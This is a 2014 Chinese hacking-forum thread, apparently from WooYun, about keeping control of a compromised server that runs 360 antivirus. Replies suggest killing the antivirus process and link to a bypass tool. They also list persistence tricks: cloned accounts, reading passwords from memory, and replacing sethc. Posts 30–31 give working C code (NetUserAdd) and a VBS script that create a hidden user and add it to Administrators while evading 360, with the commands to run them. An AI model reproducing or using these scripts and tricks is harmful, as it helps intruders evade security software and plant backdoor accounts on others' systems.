服务器有360等怎么提权呢?
乌云 | 2014-02-18 12:16
服务器有360等怎么提权、得到控制呢?
手里没有免杀远控。
相关讨论:
1#
龙辰 (头像我女神) | 2014-02-18 12:24
第一步:潜入机房
第二步:手拿鼠标控制电脑关闭360
2#
Mas | 2014-02-18 12:28
现在360不好弄了吧
3#
cmd2k | 2014-02-18 12:39
c:/kill360.exe
想办法重启
搞定
4#
乌云 | 2014-02-18 12:40
@cmd2k taskkill不能吧?
5#
lpcdma | 2014-02-18 12:44
找可利用的系统服务。
6#
小乐天 (小白一枚) | 2014-02-18 12:46
killdog
7#
Mas | 2014-02-18 13:00
@乌云 你遇到什么问题?创建不了帐号?exp上传被杀?还是什么问题 你没描述清楚 据我所知 360没什么吊用吧?
8#
高斯 | 2014-02-18 13:03
360exp.exe
9#
乌云 | 2014-02-18 13:06
@Mas 创建帐号不行啊。
10#
乌云 | 2014-02-18 13:15
现在是获得admin权限,但是如果是想得到后门呢?3389或者什么的
11#
cmd2k | 2014-02-18 13:17
@乌云 有exp K360的
12#
乌云 | 2014-02-18 13:21
@cmd2k 现在就是administrator,我没找到啊,,,,求分享。。。
13#
园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-18 13:36
@乌云 net user cscript执行下就行了
14#
乌云 | 2014-02-18 13:47
@园长 360警告家账户了。
15#
园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-18 13:51
@乌云 vbs也拦截咩,这个vbs用了很久了。
16#
cmd2k | 2014-02-18 13:53
@乌云 http://www.moonsec.com/content/uploadfile/201401/c2f61390419703.rar
17#
乌云 | 2014-02-18 14:15
@cmd2k 很悲催的说没装.net 2.0
18#
cmd2k | 2014-02-18 14:17
@乌云 .............
19#
乌云 | 2014-02-18 14:20
@园长 额。系统问题。我在win7测试的。刚才又在03上试了下,没提示,谢谢了。。。另外,我竟然得查下“咩”是啥意思。。。我屌丝至极了么。。。。不懂女人啊。。。
20#
RootUser | 2014-02-18 15:58
mark
21#
暴暴 | 2014-02-18 16:14
潜入360公司,找到后台,直接利用360后门控制
22#
寂寞的瘦子 (’) | 2014-02-18 20:14
@园长 低权限的帐号可以执行你那句干掉360吗
23#
寂寞的瘦子 (’) | 2014-02-18 20:14
@乌云 园长是男孩
24#
园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-18 21:01
@寂寞的瘦子 我发的两个都是绕过360添加账号拦截的,so 低权限根本不能加账号嘛。
25#
Airbasic (?????????????????????????) | 2014-02-18 21:17
SYSTEM权限时候taskkill /f /im
26#
kow (我只是个酱油。。。) | 2014-02-18 21:59
权限高的话读取密码,或者改管理员密码登陆,或者上免杀。。。
27#
乌云 | 2014-02-19 08:55
@kow 忽然ipconfig了下,是TM内网!开不了3389,本机亲测成功,但那头开不了,而且就算开了也是内网。。。额
28#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-02-19 09:21
1、改密码
2、克隆账号
3、读取内存密码
4、替换sethc
5、……
29#
Mas | 2014-02-19 13:56
@乌云 有admin权限了 想怎么搞 就怎么搞了
30#
TellYouThat | 2014-02-19 16:06
@园长 比较菜..没看明白日志
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
int main()
{
USER_INFO_1 u;
DWORD dwError=0;
u.usri1_name=L"tomcat";
u.usri1_password=L"admin888";
u.usri1_priv=USER_PRIV_USER;
u.usri1_home_dir = NULL;
u.usri1_comment = NULL;
u.usri1_flags=UF_DONT_EXPIRE_PASSWD;
u.usri1_script_path = NULL;
NetUserAdd(NULL, 1, (LPBYTE)&u, &dwError);
}
这一段编译后直接执行exe?直接c:\xx.exe?
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","test")
od.SetPassword "1234"
od.SetInfo
Set of=GetObject(os&"/test",user)
oe.add os&"/test"
这一段直接C:\XX.vbs?
另外对于第一段,有木有提到administrators组的代码?
31#
园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-19 16:59
@TellYouThat 第一段代码当时测试的时候后面的不知道怎么写了,会写的大牛补全下。第二个保存为360.vbs :
cd c:/ cscript 360.vbs
执行就行了。
32#
TellYouThat | 2014-02-19 22:12
@园长 Thanks~ 一直直接 xx.vbs或者wscript xx.vbs...
33#
大云 | 2014-02-20 10:02
测试了下,那段vbs过360冇咩压力,不过安全狗就...
34#
乌云 | 2014-02-20 14:42
@大云 win2003没有问题,win7等不行
留言评论(旧系统):